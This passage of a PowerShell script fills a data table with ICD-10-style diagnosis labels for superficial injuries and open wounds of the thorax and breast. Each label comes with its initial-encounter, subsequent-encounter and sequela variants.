thorax","Superficial foreign body of unspecified front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right front wall of thorax","Insect bite (nonvenomous) of right front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right front wall of thorax","Insect bite (nonvenomous) of right front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right front wall of thorax","Insect bite (nonvenomous) of right front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left front wall of thorax","Insect bite (nonvenomous) of left front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left front wall of thorax","Insect bite (nonvenomous) of left front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left front wall of thorax","Insect bite (nonvenomous) of left front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified front wall of thorax","Insect bite (nonvenomous) of unspecified front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified front wall of thorax","Insect bite (nonvenomous) of unspecified front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified front wall of thorax","Insect bite (nonvenomous) of unspecified front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right front wall of thorax","Other superficial bite of right front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right front wall of thorax","Other superficial bite of right front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right front wall of thorax","Other superficial bite of right front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left front wall of thorax","Other superficial bite of left front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left front wall of thorax","Other superficial bite of left front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left front wall of thorax","Other superficial bite of left front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified front wall of thorax","Other superficial bite of unspecified front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified front wall of thorax","Other superficial bite of unspecified front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified front wall of thorax","Other superficial bite of unspecified front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of right back wall of thorax","Unspecified superficial injuries of right back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of right back wall of thorax","Unspecified superficial injuries of right back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of right back wall of thorax","Unspecified superficial injuries of right back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of left back wall of thorax","Unspecified superficial injuries of left back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of left back wall of thorax","Unspecified superficial injuries of left back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of left back wall of thorax","Unspecified superficial injuries of left back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of unspecified back wall of thorax","Unspecified superficial injuries of unspecified back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of unspecified back wall of thorax","Unspecified superficial injuries of unspecified back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of unspecified back wall of thorax","Unspecified superficial injuries of unspecified back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of right back wall of thorax","Abrasion of right back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right back wall of thorax","Abrasion of right back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right back wall of thorax","Abrasion of right back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of left back wall of thorax","Abrasion of left back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left back wall of thorax","Abrasion of left back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left back wall of thorax","Abrasion of left back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified back wall of thorax","Abrasion of unspecified back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified back wall of thorax","Abrasion of unspecified back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified back wall of thorax","Abrasion of unspecified back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right back wall of thorax","Blister (nonthermal) of right back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right back wall of thorax","Blister (nonthermal) of right back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right back wall of thorax","Blister (nonthermal) of right back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left back wall of thorax","Blister (nonthermal) of left back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left back wall of thorax","Blister (nonthermal) of left back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left back wall of thorax","Blister (nonthermal) of left back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified back wall of thorax","Blister (nonthermal) of unspecified back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified back wall of thorax","Blister (nonthermal) of unspecified back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified back wall of thorax","Blister (nonthermal) of unspecified back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of right back wall of thorax","External constriction of right back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right back wall of thorax","External constriction of right back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right back wall of thorax","External constriction of right back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of left back wall of thorax","External constriction of left back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left back wall of thorax","External constriction of left back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left back wall of thorax","External constriction of left back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified back wall of thorax","External constriction of unspecified back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified back wall of thorax","External constriction of unspecified back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified back wall of thorax","External constriction of unspecified back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right back wall of thorax","Superficial foreign body of right back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right back wall of thorax","Superficial foreign body of right back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right back wall of thorax","Superficial foreign body of right back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left back wall of thorax","Superficial foreign body of left back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left back wall of thorax","Superficial foreign body of left back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left back wall of thorax","Superficial foreign body of left back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified back wall of thorax","Superficial foreign body of unspecified back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified back wall of thorax","Superficial foreign body of unspecified back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified back wall of thorax","Superficial foreign body of unspecified back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right back wall of thorax","Insect bite (nonvenomous) of right back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right back wall of thorax","Insect bite (nonvenomous) of right back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right back wall of thorax","Insect bite (nonvenomous) of right back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left back wall of thorax","Insect bite (nonvenomous) of left back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left back wall of thorax","Insect bite (nonvenomous) of left back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left back wall of thorax","Insect bite (nonvenomous) of left back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified back wall of thorax","Insect bite (nonvenomous) of unspecified back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified back wall of thorax","Insect bite (nonvenomous) of unspecified back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified back wall of thorax","Insect bite (nonvenomous) of unspecified back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right back wall of thorax","Other superficial bite of right back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right back wall of thorax","Other superficial bite of right back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right back wall of thorax","Other superficial bite of right back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left back wall of thorax","Other superficial bite of left back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left back wall of thorax","Other superficial bite of left back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left back wall of thorax","Other superficial bite of left back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified back wall of thorax","Other superficial bite of unspecified back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified back wall of thorax","Other superficial bite of unspecified back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified back wall of thorax","Other superficial bite of unspecified back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified parts of thorax","Unspecified superficial injury of unspecified parts of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified parts of thorax","Unspecified superficial injury of unspecified parts of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified parts of thorax","Unspecified superficial injury of unspecified parts of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified parts of thorax","Abrasion of unspecified parts of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified parts of thorax","Abrasion of unspecified parts of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified parts of thorax","Abrasion of unspecified parts of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified parts of thorax","Blister (nonthermal) of unspecified parts of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified parts of thorax","Blister (nonthermal) of unspecified parts of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified parts of thorax","Blister (nonthermal) of unspecified parts of thorax, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified parts of thorax","External constriction of unspecified parts of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified parts of thorax","External constriction of unspecified parts of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified parts of thorax","External constriction of unspecified parts of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified parts of thorax","Superficial foreign body of unspecified parts of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified parts of thorax","Superficial foreign body of unspecified parts of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified parts of thorax","Superficial foreign body of unspecified parts of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified parts of thorax","Insect bite (nonvenomous) of unspecified parts of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified parts of thorax","Insect bite (nonvenomous) of unspecified parts of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified parts of thorax","Insect bite (nonvenomous) of unspecified parts of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified parts of thorax","Other superficial bite of unspecified parts of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified parts of thorax","Other superficial bite of unspecified parts of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified parts of thorax","Other superficial bite of unspecified parts of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right breast","Unspecified open wound of right breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right breast","Unspecified open wound of right breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right breast","Unspecified open wound of right breast, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left breast","Unspecified open wound of left breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left breast","Unspecified open wound of left breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left breast","Unspecified open wound of left breast, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified breast","Unspecified open wound of unspecified breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified breast","Unspecified open wound of unspecified breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified breast","Unspecified open wound of unspecified breast, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right breast","Laceration without foreign body of right breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right breast","Laceration without foreign body of right breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right breast","Laceration without foreign body of right breast, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left breast","Laceration without foreign body of left breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left breast","Laceration without foreign body of left breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left breast","Laceration without foreign body of left breast, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified breast","Laceration without foreign body of unspecified breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified breast","Laceration without foreign body of unspecified breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified breast","Laceration without foreign body of unspecified breast, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right breast","Laceration with foreign body of right breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right breast","Laceration with foreign body of right breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right breast","Laceration with foreign body of right breast, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left breast","Laceration with foreign body of left breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left breast","Laceration with foreign body of left breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left breast","Laceration with foreign body of left breast, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified breast","Laceration with foreign body of unspecified breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified breast","Laceration with foreign body of unspecified breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified breast","Laceration with foreign body of unspecified breast, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right breast","Puncture wound without foreign body of right breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right breast","Puncture wound without foreign body of right breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right breast","Puncture wound without foreign body of right breast, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left breast","Puncture wound without foreign body of left breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left breast","Puncture wound without foreign body of left breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left breast","Puncture wound without foreign body of left breast, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified breast","Puncture wound without foreign body of unspecified breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified breast","Puncture wound without foreign body of unspecified breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified breast","Puncture wound without foreign body of unspecified breast, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right breast","Puncture wound with foreign body of right breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right breast","Puncture wound with foreign body of right breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right breast","Puncture wound with foreign body of right breast, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left breast","Puncture wound with foreign body of left breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left breast","Puncture wound with foreign body of left breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left breast","Puncture wound with foreign body of left breast, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified breast","Puncture wound with foreign body of unspecified breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified breast","Puncture wound with foreign body of unspecified breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified breast","Puncture wound with foreign body of unspecified breast, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right breast","Open bite of right breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right breast","Open bite of right breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right breast","Open bite of right breast, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left breast","Open bite of left breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left breast","Open bite of left breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left breast","Open bite of left breast, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified breast","Open bite of unspecified breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified breast","Open bite of unspecified breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified breast","Open bite of unspecified breast, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right front wall of thorax without penetration into thoracic cavity","Unspecified open wound of right front wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right front wall of thorax without penetration into thoracic cavity","Unspecified open wound of right front wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right front wall of thorax without penetration into thoracic cavity","Unspecified open wound of right front wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left front wall of thorax without penetration into thoracic cavity","Unspecified open wound of left front wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left front wall of thorax without penetration into thoracic cavity","Unspecified open wound of left front wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left front wall of thorax without penetration into thoracic cavity","Unspecified open wound of left front wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified front wall of thorax without penetration into thoracic cavity","Unspecified open wound of unspecified front wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified front wall of thorax without penetration into thoracic cavity","Unspecified open wound of unspecified front wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified front wall of thorax without penetration into thoracic cavity","Unspecified open wound of unspecified front wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right front wall of thorax without penetration into thoracic cavity","Laceration without foreign body of right front wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right front wall of thorax without penetration into thoracic cavity","Laceration without foreign body of right front wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right front wall of thorax without penetration into thoracic cavity","Laceration without foreign body of right front wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left front wall of thorax without penetration into thoracic cavity","Laceration without foreign body of left front wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left front wall of thorax without penetration into thoracic cavity","Laceration without foreign body of left front wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left front wall of thorax without penetration into thoracic cavity","Laceration without foreign body of left front wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified front wall of thorax without penetration into thoracic cavity","Laceration without foreign body of unspecified front wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified front wall of thorax without penetration into thoracic cavity","Laceration without foreign body of unspecified front wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified front wall of thorax without penetration into thoracic cavity","Laceration without foreign body of unspecified front wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right front wall of thorax without penetration into thoracic cavity","Laceration with foreign body of right front wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right front wall of thorax without penetration into thoracic cavity","Laceration with foreign body of right front wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right front wall of thorax without penetration into thoracic cavity","Laceration with foreign body of right front wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left front wall of thorax without penetration into thoracic cavity","Laceration with foreign body of left front wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left front wall of thorax without penetration into thoracic cavity","Laceration with foreign body of left front wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left front wall of thorax without penetration into thoracic cavity","Laceration with foreign body of left front wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified front wall of thorax without penetration into thoracic cavity","Laceration with foreign body of unspecified front wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified front wall of thorax without penetration into thoracic cavity","Laceration with foreign body of unspecified front wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified front wall of thorax without penetration into thoracic cavity","Laceration with foreign body of unspecified front wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right front wall of thorax without penetration into thoracic cavity","Puncture wound without foreign body of right front wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right front wall of thorax without penetration into thoracic cavity","Puncture wound without foreign body of right front wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right front wall of thorax without penetration into thoracic cavity","Puncture wound without foreign body of right front wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left front wall of thorax without penetration into thoracic cavity","Puncture wound without foreign body of left front wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left front wall of thorax without penetration into thoracic cavity","Puncture wound without foreign body of left front wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left front wall of thorax without penetration into thoracic cavity","Puncture wound without foreign body of left front wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified front wall of thorax without penetration into thoracic cavity","Puncture wound without foreign body of unspecified front wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified front wall of thorax without penetration into thoracic cavity","Puncture wound without foreign body of unspecified front wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified front wall of thorax without penetration into thoracic cavity","Puncture wound without foreign body of unspecified front wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right front wall of thorax without penetration into thoracic cavity","Puncture wound with foreign body of right front wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right front wall of thorax without penetration into thoracic cavity","Puncture wound with foreign body of right front wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right front wall of thorax without penetration into thoracic cavity","Puncture wound with foreign body of right front wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left front wall of thorax without penetration into thoracic cavity","Puncture wound with foreign body of left front wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left front wall of thorax without penetration into thoracic cavity","Puncture wound with foreign body of left front wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left front wall of thorax without penetration into thoracic cavity","Puncture wound with foreign body of left front wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified front wall of thorax without penetration into thoracic cavity","Puncture wound with foreign body of unspecified front wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified front wall of thorax without penetration into thoracic cavity","Puncture wound with foreign body of unspecified front wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified front wall of thorax without penetration into thoracic cavity","Puncture wound with foreign body of unspecified front wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right front wall of thorax without penetration into thoracic cavity","Open bite of right front wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right front wall of thorax without penetration into thoracic cavity","Open bite of right front wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right front wall of thorax without penetration into thoracic cavity","Open bite of right front wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left front wall of thorax without penetration into thoracic cavity","Open bite of left front wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left front wall of thorax without penetration into thoracic cavity","Open bite of left front wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left front wall of thorax without penetration into thoracic cavity","Open bite of left front wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified front wall of thorax without penetration into thoracic cavity","Open bite of unspecified front wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified front wall of thorax without penetration into thoracic cavity","Open bite of unspecified front wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified front wall of thorax without penetration into thoracic cavity","Open bite of unspecified front wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right back wall of thorax without penetration into thoracic cavity","Unspecified open wound of right back wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right back wall of thorax without penetration into thoracic cavity","Unspecified open wound of right back wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right back wall of thorax without penetration into thoracic cavity","Unspecified open wound of right back wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left back wall of thorax without penetration into thoracic cavity","Unspecified open wound of left back wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left back wall of thorax without penetration into thoracic cavity","Unspecified open wound of left back wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left back wall of thorax without penetration into 